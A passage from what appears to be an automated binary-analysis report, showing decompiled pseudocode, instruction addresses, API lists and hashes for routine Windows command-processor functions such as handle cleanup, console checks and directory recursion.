						if( *(_t39 + 8) != _t42 && CloseHandle( *(_t39 + 8)) == 0) {
							goto L10;
						}
						if( *_t29 != _t42 && CloseHandle( *_t29) == 0) {
							goto L10;
						}
						_t18 = RtlFreeHeap(GetProcessHeap(), _t42, _t39);
						L18:
						if(_t42 != 0) {
							_t18 = ReleaseMutex(_t42);
							if(_t18 == 0) {
								_push(_t32);
								goto L11;
							}
						}
					}
				}
				return _t18;
			}










                                              0x002c2664
                                              0x002c2668
                                              0x002c2670
                                              0x002c2670
                                              0x002c2674
                                              0x002c2676
                                              0x002c267d
                                              0x002c2680
                                              0x002c2682
                                              0x002c2718
                                              0x00000000
                                              0x002c2688
                                              0x002c2688
                                              0x002c268d
                                              0x002c268f
                                              0x002c268f
                                              0x002c2694
                                              0x002c2696
                                              0x002c2699
                                              0x002c269e
                                              0x002c26a0
                                              0x002c26a0
                                              0x002c26a5
                                              0x002c26a8
                                              0x002c26ad
                                              0x002c26af
                                              0x002c26af
                                              0x002c26b4
                                              0x002c26bb
                                              0x002c26bd
                                              0x002c26bd
                                              0x002c26c0
                                              0x002c26c8
                                              0x002c26d7
                                              0x002c26d7
                                              0x002c26dd
                                              0x002c26dd
                                              0x002c26e0
                                              0x002c26e0
                                              0x002c26e8
                                              0x00000000
                                              0x00000000
                                              0x002c26f9
                                              0x00000000
                                              0x00000000
                                              0x002c2710
                                              0x002c271b
                                              0x002c271d
                                              0x002c2720
                                              0x002c2728
                                              0x002c272a
                                              0x00000000
                                              0x002c272b
                                              0x002c2728
                                              0x002c271d
                                              0x002c26bb
                                              0x002c2738

                                              APIs
                                                • Part of subcall function 002C2D6D: WaitForSingleObjectEx.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,000000FF,00000000,00000000,00000000,?,002C1838,?), ref: 002C2D7C
                                              • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?,?), ref: 002C26CD
                                                • Part of subcall function 002C2DB4: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000000,?,002C26A5,?), ref: 002C2DBD
                                                • Part of subcall function 002C2DB4: CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?,?,00000000,?,002C26A5,?), ref: 002C2DC6
                                                • Part of subcall function 002C2DB4: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,?,002C26A5,?), ref: 002C2DDF
                                              • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 002C26ED
                                              • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 002C26FD
                                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?), ref: 002C2709
                                              • RtlFreeHeap.NTDLL(00000000), ref: 002C2710
                                              • ReleaseMutex.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?), ref: 002C2720
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: CloseHandle$ErrorHeapLast$FreeMutexObjectProcessReleaseSingleWait
                                              • String ID:
                                              • API String ID: 2383944720-0
                                              • Opcode ID: f570354c8c7f175499b704df4786f5792b03e9b2ec3a593b639c2c4a806e4cf2
                                              • Instruction ID: 0043b9a8c161e184d7c7b1c2873ddae27040f8d2c35556a0f7edf2caef0e7904
                                              • Opcode Fuzzy Hash: f570354c8c7f175499b704df4786f5792b03e9b2ec3a593b639c2c4a806e4cf2
                                              • Instruction Fuzzy Hash: 60217170221117EBCB14AF52D888F69F768FF50701710832DE4099A510DF70DC68DFA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002C6E90, Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 80COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 002AEA40: wcschr.MSVCRT ref: 002AEAB7
                                                • Part of subcall function 002AEA40: iswspace.MSVCRT ref: 002AEB2D
                                                • Part of subcall function 002AEA40: wcschr.MSVCRT ref: 002AEB49
                                                • Part of subcall function 002AEA40: wcschr.MSVCRT ref: 002AEB6D
                                              • _wcsicmp.MSVCRT ref: 002C6EFC
                                              • _wcsicmp.MSVCRT ref: 002C6F1B
                                              • _wcsicmp.MSVCRT ref: 002C6F41
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: _wcsicmpwcschr$iswspace
                                              • String ID: KEYS$LIST$OFF
                                              • API String ID: 3924973218-4129271751
                                              • Opcode ID: 73fa70018100b470aa8675ed069ee2ed09daff4501c39b1ec71ecc8270b4eeeb
                                              • Instruction ID: 0aaf175a2c7d99c5688cc0d17f8e4f577c61a934a8ac24ce06d2d84ee9e46540
                                              • Opcode Fuzzy Hash: 73fa70018100b470aa8675ed069ee2ed09daff4501c39b1ec71ecc8270b4eeeb
                                              • Instruction Fuzzy Hash: D3118C31238702ABA314AB26FC4EE2373A8EBC5760761811FF5074A5C2DE725D618A25
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002B6CE1, Relevance: 9.1, APIs: 6, Instructions: 79memorysynchronizationCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 92%
                                              			E002B6CE1(void* __eax) {
				void** _v0;
				void* _v8;
				int _t19;
				void** _t30;
				void* _t32;
				void** _t33;
				void* _t40;
				void* _t43;

				_t32 =  *0x2cd010; // 0x0
				if(_t32 != 0) {
					_push(_t32);
					_t40 = _t32;
					_t2 = _t40 + 4; // 0x4
					_t30 = _t2;
					_t33 = _t30;
					E002C2D6D(_t33,  &_v8);
					_t19 =  *_t40 - 1;
					 *_t40 = _t19;
					if(_t19 != 0) {
						_t43 = _v8;
						goto L20;
					} else {
						_t34 =  *(_t40 + 8);
						if( *(_t40 + 8) != 0) {
							E002C2DB4(_t34);
						}
						_t43 = 0;
						 *(_t40 + 8) = 0;
						_t35 =  *(_t40 + 0xc);
						if( *(_t40 + 0xc) != 0) {
							E002C2DB4(_t35);
						}
						_t36 = _v8;
						 *(_t40 + 0xc) = _t43;
						if(_v8 != 0) {
							E002C2DE9(_t36);
						}
						_t19 = E002C25D6(_t36);
						if(_t19 == 0) {
							_t8 = _t40 + 0x18; // 0x18
							_t33 = _t8;
							E002C170A(_t33);
							if( *(_t40 + 0xc) != _t43 && CloseHandle( *(_t40 + 0xc)) == 0) {
								L12:
								_push(_t33);
								L13:
								_t33 = _v0;
								E002C2D56();
							}
							if( *(_t40 + 8) != _t43 && CloseHandle( *(_t40 + 8)) == 0) {
								goto L12;
							}
							if( *_t30 != _t43 && CloseHandle( *_t30) == 0) {
								goto L12;
							}
							_t19 = RtlFreeHeap(GetProcessHeap(), _t43, _t40);
							L20:
							if(_t43 != 0) {
								_t19 = ReleaseMutex(_t43);
								if(_t19 == 0) {
									_push(_t33);
									goto L13;
								}
							}
						}
					}
					return _t19;
				} else {
					return __eax;
				}
			}











                                              0x002b6ce1
                                              0x002b6ce9
                                              0x002c2664
                                              0x002c2668
                                              0x002c2670
                                              0x002c2670
                                              0x002c2674
                                              0x002c2676
                                              0x002c267d
                                              0x002c2680
                                              0x002c2682
                                              0x002c2718
                                              0x00000000
                                              0x002c2688
                                              0x002c2688
                                              0x002c268d
                                              0x002c268f
                                              0x002c268f
                                              0x002c2694
                                              0x002c2696
                                              0x002c2699
                                              0x002c269e
                                              0x002c26a0
                                              0x002c26a0
                                              0x002c26a5
                                              0x002c26a8
                                              0x002c26ad
                                              0x002c26af
                                              0x002c26af
                                              0x002c26b4
                                              0x002c26bb
                                              0x002c26bd
                                              0x002c26bd
                                              0x002c26c0
                                              0x002c26c8
                                              0x002c26d7
                                              0x002c26d7
                                              0x002c26dd
                                              0x002c26dd
                                              0x002c26e0
                                              0x002c26e0
                                              0x002c26e8
                                              0x00000000
                                              0x00000000
                                              0x002c26f9
                                              0x00000000
                                              0x00000000
                                              0x002c2710
                                              0x002c271b
                                              0x002c271d
                                              0x002c2720
                                              0x002c2728
                                              0x002c272a
                                              0x00000000
                                              0x002c272b
                                              0x002c2728
                                              0x002c271d
                                              0x002c26bb
                                              0x002c2738
                                              0x002b6cef
                                              0x002b6cef
                                              0x002b6cef

                                              APIs
                                              • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?,?), ref: 002C26CD
                                              • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 002C26ED
                                              • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 002C26FD
                                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?), ref: 002C2709
                                              • RtlFreeHeap.NTDLL(00000000), ref: 002C2710
                                              • ReleaseMutex.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?), ref: 002C2720
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: CloseHandle$Heap$FreeMutexProcessRelease
                                              • String ID:
                                              • API String ID: 1689195821-0
                                              • Opcode ID: de656b3a0de37ba99d6b9c6fdaf222500badbeafcf7c3a9c18ed98ebb4999017
                                              • Instruction ID: 13fefdabf1f06606c6aa72141d2b3c49f1c3c58324acd43c031840d3c10246ce
                                              • Opcode Fuzzy Hash: de656b3a0de37ba99d6b9c6fdaf222500badbeafcf7c3a9c18ed98ebb4999017
                                              • Instruction Fuzzy Hash: 4E214C70121113EBDB28AF62D898F6AB768FF50701720832DE44A8A514DF70DC68DFA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002B0178, Relevance: 9.1, APIs: 6, Instructions: 62COMMON
                                              Download Yara Rule
                                              APIs
                                              • _get_osfhandle.MSVCRT ref: 002B0183
                                              • GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,002BD6A1), ref: 002B018D
                                              • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6), ref: 002B01B8
                                              • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(002E7F20,00000001), ref: 002B01C7
                                              • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 002B01D2
                                              • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(002E7F20), ref: 002B01DB
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: LockShared$AcquireConsoleFileHandleModeReleaseType_get_osfhandle
                                              • String ID:
                                              • API String ID: 513048808-0
                                              • Opcode ID: b82544615f3930589f5f05b8ec8934cec60e3a4b298668563dbea154dc52186d
                                              • Instruction ID: c8e2fc9532b89e4e398c5237c042040b90b0e34f67e51e4283ddcc26b12cb5a9
                                              • Opcode Fuzzy Hash: b82544615f3930589f5f05b8ec8934cec60e3a4b298668563dbea154dc52186d
                                              • Instruction Fuzzy Hash: 1411C833874191AFEB168B6DEDCCBFB36ACD745361F240266E83996190D7744D948260
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002B269C, Relevance: 9.1, APIs: 6, Instructions: 54COMMON
                                              Download Yara Rule
                                              APIs
                                              • _get_osfhandle.MSVCRT ref: 002B26A7
                                              • GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,002AC5F8,?,?,?), ref: 002B26B6
                                              • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,?,?,?,?,?,?,?,?,?,?,?,?,?,?,002AC5C6), ref: 002B26D2
                                              • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(002E7F20,00000002), ref: 002B26E1
                                              • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 002B26EC
                                              • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(002E7F20,?,?,?,?,?,?,?,?,?,?,?,?,?,?,002AC5C6), ref: 002B26F5
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: LockShared$AcquireConsoleFileHandleModeReleaseType_get_osfhandle
                                              • String ID:
                                              • API String ID: 513048808-0
                                              • Opcode ID: 610a6a7fd32dcc2e211227d809187bb30bd29984680d9da7f9b6d8f5608027e2
                                              • Instruction ID: 8cabe9798f6dc0901fcefe4c5ee93921932d777e1626a93103dd4c51b0ea819f
                                              • Opcode Fuzzy Hash: 610a6a7fd32dcc2e211227d809187bb30bd29984680d9da7f9b6d8f5608027e2
                                              • Instruction Fuzzy Hash: 4601F7338342A2EB8A200779AC8C9FB775CD6463B17240322FC25D25E0DD608CAD51A4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002B5266, Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 303COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 90%
                                              			E002B5266(void* __ecx, signed int __edx, intOrPtr _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16, intOrPtr _a20, char _a24, intOrPtr _a28, intOrPtr _a32) {
				signed int _v8;
				signed int _v12;
				int _v16;
				signed int _v20;
				signed int _v24;
				int _v28;
				intOrPtr _v48;
				intOrPtr _v52;
				signed int _v56;
				char _v60;
				char** _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				void _v76;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				void _v124;
				unsigned int _t115;
				void* _t123;
				intOrPtr _t129;
				void* _t138;
				signed int _t140;
				signed int _t141;
				signed int _t143;
				signed int _t144;
				signed int _t145;
				intOrPtr _t146;
				void* _t147;
				intOrPtr _t152;
				intOrPtr _t162;
				char _t163;
				char* _t164;
				void* _t168;
				void* _t172;
				char* _t180;
				char* _t181;
				void* _t182;
				signed int _t183;
				signed int _t195;
				void* _t196;
				void* _t197;
				intOrPtr* _t198;
				intOrPtr _t203;
				intOrPtr _t204;
				intOrPtr _t210;
				signed int _t211;
				signed int _t216;
				signed int _t218;
				void* _t220;
				void* _t222;
				void* _t224;
				void* _t225;
				intOrPtr _t227;
				intOrPtr _t231;

				_t195 = __edx;
				_v20 = __edx;
				_t168 = __ecx;
				_v28 = 0;
				_v16 = 0;
				_t227 =  *0x2cd544; // 0x0
				if(_t227 != 0) {
					L47:
					return 1;
				}
				_t115 = _a12;
				_v8 = _t115;
				_t8 =  &_a24; // 0x2b3078
				_t208 = _t115 >> 0x00000002 & 1;
				_t123 = E002B5590(__ecx, __edx, _a4, _a8, _t115 >> 0x00000002 & 1, _a16, _a20,  *_t8, _a28, _a32);
				if(_t123 == 0) {
					_v16 = 1;
					_t216 = _v8 & 0x00000001;
					L4:
					E002B0040( *((intOrPtr*)(_t168 + 0x18)));
					 *((intOrPtr*)(_t168 + 0x18)) = 0;
					_t231 =  *0x2cd544; // 0x0
					if(_t231 != 0) {
						goto L47;
					}
					if(_t216 == 0) {
						return 0;
					}
					memset( &_v76, 0, 0x30);
					_t225 = _t224 + 0xc;
					_t129 = E002B297B( *((intOrPtr*)(_t168 + 4)));
					_t172 = 0x10;
					_v72 = _t129;
					_t173 = E002B00B0(_t172);
					if(_t173 == 0) {
						L51:
						E002C9287(_t173);
						__imp__longjmp(0x2db8b8, 1);
						L52:
						_v56 = _t195;
						_t218 = _t195;
						L10:
						if( *0x2cd544 != 0) {
							goto L47;
						}
						_v12 = _t195;
						if(_v56 <= 0) {
							L38:
							E002B0040(_v48);
							E002B0040(_v52);
							E002B0040(_v64[1]);
							E002B0040(_v64);
							E002B0040(_v72);
							if(_t218 != 0 || _v16 != _t218) {
								return _t218;
							} else {
								_push(2);
								L41:
								_pop(_t138);
								return _t138;
							}
						} else {
							goto L12;
						}
						do {
							L12:
							_t180 = ".";
							_t210 =  *((intOrPtr*)(_v48 + _v12 * 4));
							_t37 = _t210 + 0x30; // 0x30
							_t140 = _t37;
							_v24 = _t140;
							while(1) {
								_t196 =  *_t140;
								if(_t196 !=  *_t180) {
									break;
								}
								if(_t196 == 0) {
									L17:
									_t141 = 0;
									L18:
									if(_t141 == 0) {
										goto L37;
									}
									_t181 = L"..";
									_t41 = _t210 + 0x30; // 0x30
									_t144 = _t41;
									while(1) {
										_t197 =  *_t144;
										if(_t197 !=  *_t181) {
											break;
										}
										if(_t197 == 0) {
											L24:
											_t145 = 0;
											L25:
											if(_t145 == 0) {
												goto L37;
											}
											if((_v8 & 0x00000002) != 0 || ( *(_t210 + 4) & 0x00000400) == 0) {
												L28:
												_t198 =  *((intOrPtr*)(_t168 + 4));
												_t51 = _t198 + 2; // 0x402
												_t182 = _t51;
												do {
													_t146 =  *_t198;
													_t198 = _t198 + 2;
												} while (_t146 != 0);
												_t211 = _v24;
												_t183 = _t211;
												_t195 = _t198 - _t182 >> 1;
												_t220 = _t183 + 2;
												do {
													_t147 =  *_t183;
													_t183 = _t183 + 2;
												} while (_t147 != _v28);
												_t55 = _t195 + 2; // 0x400
												_t185 = _t183 - _t220 >> 1;
												_t222 = _t55 + (_t183 - _t220 >> 1);
												if(_t222 > 0x7fe7) {
													_push(_t211);
													E002AC5A2(_t185, 0x400023d8, 2,  *((intOrPtr*)(_t168 + 4)));
													_push(0x6f);
													goto L41;
												}
												memset( &_v124, 0, 0x30);
												_t225 = _t225 + 0xc;
												_t173 = _t222 + _t222;
												_t152 = E002B00B0(_t222 + _t222);
												if(_t152 == 0) {
													goto L51;
												}
												_v120 = _t152;
												E002B51C9(_t152, _t222,  *((intOrPtr*)(_t168 + 4)), _t211);
												_t65 =  &_a24; // 0x2b3078
												_v112 =  *((intOrPtr*)(_t168 + 0xc));
												_v116 =  *((intOrPtr*)(_t168 + 8));
												_v108 =  *((intOrPtr*)(_t168 + 0x10));
												_t218 = E002B5266( &_v124, _v20, _a4, _a8, _v8, _a16, _a20,  *_t65, _a28, _a32);
												E002B0040(_v100);
												_v100 = 0;
												E002B0040(_v96);
												_v96 = 0;
												E002B0040(_v120);
												_v120 = 0;
												if(_t218 == 0) {
													_v16 = 1;
													goto L37;
												}
												if(_t218 != 2) {
													if(_t218 != 0x6f && _t218 != 3) {
														_t162 =  *((intOrPtr*)(_v48 + _v12 * 4));
														if(( *(_t162 + 4) & 0x00000400) == 0) {
															goto L38;
														}
														if(( *(_t162 + 0x28) & 0x20000000) != 0) {
															goto L36;
														}
														if( *(_t162 + 0x28) != 0x8000000a) {
															goto L38;
														}
													}
												}
												L36:
												_t218 = 0;
												goto L37;
											} else {
												if(( *(_t210 + 0x28) & 0x20000000) != 0 ||  *(_t210 + 0x28) == 0x8000000a) {
													goto L37;
												} else {
													goto L28;
												}
											}
										}
										_t203 =  *((intOrPtr*)(_t144 + 2));
										_t43 =  &(_t181[2]); // 0x2e
										if(_t203 !=  *_t43) {
											break;
										}
										_t144 = _t144 + 4;
										_t181 =  &(_t181[4]);
										if(_t203 != 0) {
											continue;
										}
										goto L24;
									}
									asm("sbb eax, eax");
									_t145 = _t144 | 0x00000001;
									goto L25;
								}
								_t204 =  *((intOrPtr*)(_t140 + 2));
								_t40 =  &(_t180[2]); // 0x200000
								if(_t204 !=  *_t40) {
									break;
								}
								_t140 = _t140 + 4;
								_t180 =  &(_t180[4]);
								if(_t204 != 0) {
									continue;
								}
								goto L17;
							}
							asm("sbb eax, eax");
							_t141 = _t140 | 0x00000001;
							goto L18;
							L37:
							_t143 = _v12 + 1;
							_v12 = _t143;
						} while (_t143 < _v56);
						goto L38;
					}
					_t163 =  *((intOrPtr*)(_t168 + 0x10));
					_v60 = _t163;
					_v64 = _t173;
					_t164 = L"*.*";
					_v68 = 1;
					_v76 = 0;
					if(_t163 == 0) {
						_t164 = "*";
					}
					 *_t173 = _t164;
					_v64[1] = E002B297B(_v72);
					_v64[3] = 0;
					_t218 = E002B5590( &_v76, _v20, 0x10, 0x10, _t208, 0, 0, 0, 0, 0);
					_t195 = 0;
					if(_t218 != 0) {
						goto L52;
					} else {
						goto L10;
					}
				}
				if(_t123 != 2) {
					if(_t123 == 3) {
						goto L3;
					}
				} else {
					L3:
					_t216 = _v8 & 0x00000001;
					if(_t216 != 0) {
						goto L4;
					}
				}
				return _t123;
			}





























































                                              0x002b5266
                                              0x002b5271
                                              0x002b5274
                                              0x002b5276
                                              0x002b527b
                                              0x002b527e
                                              0x002b5284
                                              0x002b5587
                                              0x00000000
                                              0x002b5589
                                              0x002b528a
                                              0x002b5291
                                              0x002b529d
                                              0x002b52af
                                              0x002b52b7
                                              0x002b52be
                                              0x002b5561
                                              0x002b5567
                                              0x002b52d9
                                              0x002b52dc
                                              0x002b52e3
                                              0x002b52e6
                                              0x002b52ec
                                              0x00000000
                                              0x00000000
                                              0x002b52f4
                                              0x00000000
                                              0x002b556f
                                              0x002b5303
                                              0x002b530b
                                              0x002b530e
                                              0x002b5315
                                              0x002b5316
                                              0x002b531e
                                              0x002b5322
                                              0x002bf105
                                              0x002bf105
                                              0x002bf111
                                              0x002bf117
                                              0x002bf117
                                              0x002bf11a
                                              0x002b5380
                                              0x002b5387
                                              0x00000000
                                              0x00000000
                                              0x002b5391
                                              0x002b5394
                                              0x002b5521
                                              0x002b5524
                                              0x002b552c
                                              0x002b5537
                                              0x002b553f
                                              0x002b5547
                                              0x002b554e
                                              0x00000000
                                              0x002b5555
                                              0x002b5555
                                              0x002b5557
                                              0x002b5557
                                              0x00000000
                                              0x002b5557
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002b539a
                                              0x002b539a
                                              0x002b539d
                                              0x002b53a5
                                              0x002b53a8
                                              0x002b53a8
                                              0x002b53ab
                                              0x002b53ae
                                              0x002b53ae
                                              0x002b53b4
                                              0x00000000
                                              0x00000000
                                              0x002b53bd
                                              0x002b53d8
                                              0x002b53d8
                                              0x002b53da
                                              0x002b53dc
                                              0x00000000
                                              0x00000000
                                              0x002b53e2
                                              0x002b53e7
                                              0x002b53e7
                                              0x002b53ea
                                              0x002b53ea
                                              0x002b53f0
                                              0x00000000
                                              0x00000000
                                              0x002b53f9
                                              0x002b5414
                                              0x002b5414
                                              0x002b5416
                                              0x002b5418
                                              0x00000000
                                              0x00000000
                                              0x002b5422
                                              0x002b5431
                                              0x002b5431
                                              0x002b5436
                                              0x002b5436
                                              0x002b5439
                                              0x002b5439
                                              0x002b543c
                                              0x002b543f
                                              0x002b5444
                                              0x002b5449
                                              0x002b544b
                                              0x002b544d
                                              0x002b5450
                                              0x002b5450
                                              0x002b5453
                                              0x002b5456
                                              0x002b545e
                                              0x002b5461
                                              0x002b5463
                                              0x002b546b
                                              0x002bf193
                                              0x002bf19e
                                              0x002bf1a6
                                              0x00000000
                                              0x002bf1a6
                                              0x002b547a
                                              0x002b547f
                                              0x002b5482
                                              0x002b5485
                                              0x002b548c
                                              0x00000000
                                              0x00000000
                                              0x002b5498
                                              0x002b549d
                                              0x002b54b1
                                              0x002b54b4
                                              0x002b54c0
                                              0x002b54cc
                                              0x002b54da
                                              0x002b54dc
                                              0x002b54e6
                                              0x002b54e9
                                              0x002b54f1
                                              0x002b54f4
                                              0x002b54fb
                                              0x002b5500
                                              0x002bf140
                                              0x00000000
                                              0x002bf140
                                              0x002b5509
                                              0x002bf14f
                                              0x002bf164
                                              0x002bf16e
                                              0x00000000
                                              0x00000000
                                              0x002bf17b
                                              0x00000000
                                              0x00000000
                                              0x002bf188
                                              0x00000000
                                              0x00000000
                                              0x002bf18e
                                              0x002bf14f
                                              0x002b550f
                                              0x002b550f
                                              0x00000000
                                              0x002bf121
                                              0x002bf128
                                              0x00000000
                                              0x002bf13b
                                              0x00000000
                                              0x002bf13b
                                              0x002bf128
                                              0x002b5422
                                              0x002b53fb
                                              0x002b53ff
                                              0x002b5403
                                              0x00000000
                                              0x00000000
                                              0x002b5409
                                              0x002b540c
                                              0x002b5412
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002b5412
                                              0x002b557d
                                              0x002b557f
                                              0x00000000
                                              0x002b557f
                                              0x002b53bf
                                              0x002b53c3
                                              0x002b53c7
                                              0x00000000
                                              0x00000000
                                              0x002b53cd
                                              0x002b53d0
                                              0x002b53d6
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002b53d6
                                              0x002b5573
                                              0x002b5575
                                              0x00000000
                                              0x002b5511
                                              0x002b5514
                                              0x002b5515
                                              0x002b5518
                                              0x00000000
                                              0x002b539a
                                              0x002b5328
                                              0x002b532b
                                              0x002b5330
                                              0x002b5333
                                              0x002b5338
                                              0x002b533f
                                              0x002b5342
                                              0x002b5344
                                              0x002b5344
                                              0x002b5349
                                              0x002b535e
                                              0x002b536c
                                              0x002b5374
                                              0x002b5376
                                              0x002b537a
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002b537a
                                              0x002b52c7
                                              0x002bf0fa
                                              0x00000000
                                              0x002bf100
                                              0x002b52cd
                                              0x002b52cd
                                              0x002b52d0
                                              0x002b52d3
                                              0x00000000
                                              0x00000000
                                              0x002b52d3
                                              0x002b555e

                                              APIs
                                                • Part of subcall function 002B5590: memset.MSVCRT ref: 002B5614
                                                • Part of subcall function 002B0040: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,?,00000000,002B36B3,002B3691,00000000), ref: 002B0078
                                                • Part of subcall function 002B0040: RtlFreeHeap.NTDLL(00000000), ref: 002B007F
                                              • memset.MSVCRT ref: 002B5303
                                                • Part of subcall function 002B00B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,002ADF68,00000001,?,00000000,002B3458,-00000105,002CBDD8,00000240,002B4B82,00000000,00000000,002BAE6E,00000000), ref: 002B00C1
                                                • Part of subcall function 002B00B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,002ADF68,00000001,?,00000000,002B3458,-00000105,002CBDD8,00000240,002B4B82,00000000,00000000,002BAE6E,00000000,?), ref: 002B00C8
                                              • memset.MSVCRT ref: 002B547A
                                              • longjmp.MSVCRT(002DB8B8,00000001,?,?,?), ref: 002BF111
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: Heap$memset$Process$AllocFreelongjmp
                                              • String ID: *.*$x0+
                                              • API String ID: 539101449-1178477693
                                              • Opcode ID: 98ae6622f9ec40532d9bcfe4b70749c61aa452c93a494b74004b9cc4b735ccc0
                                              • Instruction ID: a43da8ba3fd8f89261126ce93f0ab1c08ff02ad855ca89add3b52b5b0aac24f5
                                              • Opcode Fuzzy Hash: 98ae6622f9ec40532d9bcfe4b70749c61aa452c93a494b74004b9cc4b735ccc0
                                              • Instruction Fuzzy Hash: 80B1BD71D206269BCB24EFA8C881BEEB7B6AF54380F544469E809AF251D731DD61CF90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002AFE10, Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 219COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 57%
                                              			E002AFE10(void* __ebx, void* __edi, void* __eflags) {
				signed int _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _t35;
				signed int _t38;
				signed int _t49;
				signed int _t54;
				signed int _t59;
				signed int _t60;
				signed int _t73;
				signed int _t75;
				void* _t78;
				signed int _t79;
				short* _t80;
				signed int _t83;
				void* _t89;
				signed int _t91;
				signed int _t93;
				void* _t95;
				void* _t99;
				signed int _t102;
				signed int _t104;
				signed int _t108;
				signed int _t110;
				signed int _t112;
				void* _t113;
				void* _t116;
				void* _t120;
				void* _t121;

				_t121 = _t120 - 0x14;
				_push(_t113);
				_t79 = 0x4002;
				_t35 = E002B00B0(0x4002);
				_v8 = _t35;
				_t104 = _t35;
				if(_t35 == 0) {
					memset(0x2d3890, 0, 0x4006);
					_t121 = _t121 + 0xc;
					 *0x2db8a4 = 0x2d3892;
					__imp__longjmp(0x2db8f8, 0xffffffff);
					goto L37;
				} else {
					_t113 =  *0x2db8a4;
					_t102 = 0x2001;
					_t79 = _t35;
					_t78 = _t113 - _t35;
					while(1) {
						_t2 = _t102 + 0x7fffdffd; // 0x7ffffffe
						if(_t2 == 0) {
							break;
						}
						_t73 =  *(_t78 + _t79) & 0x0000ffff;
						if(_t73 == 0) {
							break;
						} else {
							 *_t79 = _t73;
							_t79 = _t79 + 2;
							_t102 = _t102 - 1;
							if(_t102 != 0) {
								continue;
							} else {
